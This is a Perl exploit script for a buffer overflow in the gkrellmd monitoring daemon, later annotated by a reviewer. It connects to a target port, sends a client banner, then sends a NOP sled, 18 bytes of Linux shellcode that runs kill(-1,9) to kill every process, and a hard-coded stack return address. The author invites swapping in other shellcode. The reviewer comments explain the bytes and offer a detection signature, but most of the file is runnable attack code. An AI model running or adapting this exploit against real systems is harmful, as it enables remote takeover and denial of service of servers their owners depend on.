#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on slackware 9
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful(?) instead
# shellcode by me this time - wow this is badly formatted(again)
# the shellcode does kill(-1,9);exit(0) - change it
#
# Reviewer notes (limited to what the code below demonstrably does):
#   Opens a TCP connection to host:port, writes the gkrellm client banner,
#   sleeps one second, then writes one 160-byte blob: 134 NOP bytes, the
#   18-byte shellcode and a hard-coded 32-bit stack address repeated twice.
#   Presumably the daemon copies that second write into a fixed-size buffer
#   (see the advisory URL above for the actual flaw); the mitigation is a
#   gkrellmd build that bounds that read. On the wire, the client banner
#   followed by a long run of 0x90 bytes is a usable detection signature.
#   Code hygiene: no `use strict`/`use warnings`; `-s` (rudimentary switch
#   parsing) is enabled on the shebang but no switch variables are read.
use IO::Socket;

if(!$ARGV[0] || !$ARGV[1]) {
    # NOTE(review): the usage text has probably lost its `<host> <port>`
    # placeholders to HTML stripping on the page this was taken from.
    print "usage: ./DSR-geekrellm-linux.pl (default gkrellmd is 19150)\n";
    exit(-1);
}

# 18 bytes of Linux/i386 machine code; the disassembly follows. Syscall 37
# (%al = 0x25) is kill(2), here with pid -1 and signal 9; syscall 1 is exit(2).
$shellcode = "\x31\xdb".
             "\x4b\x31\xc9\x83\xc1\x09\xb0\x25".
             "\xcd\x80\x31\xdb\xb0\x01\xcd\x80";
# this is ugly:
# xor %ebx, %ebx
# dec %ebx
# xor %ecx, %ecx
# add $0x9, %ecx
# movb $0x25, %al
# int $0x80
# xorl %ebx, %ebx
# movb $0x1, %al
# int $0x80

$host = $ARGV[0];
$port = $ARGV[1];

# pack("l") is a native-endian signed 32-bit long, i.e. on x86 the
# little-endian bytes of 0xbffff738. This is a guessed stack address that is
# only meaningful for the author's own environment (slackware 9, see above).
$ret = pack("l",0xbffff738);
$nop = "\x90";
# Precedence: `x` binds tighter than `.`, so this is
# (134 NOPs) . shellcode . (two copies of $ret) = 134 + 18 + 8 = 160 bytes.
$buf = $nop x 134 . $shellcode . $ret x 2;

# Indirect-object syntax (`new Class (...)`); IO::Socket::INET->new(...) is
# the conventional spelling. Left byte-identical here.
$socket = new IO::Socket::INET (
    Proto => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;

# The client-version greeting gkrellmd expects on connect.
print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;
close($socket);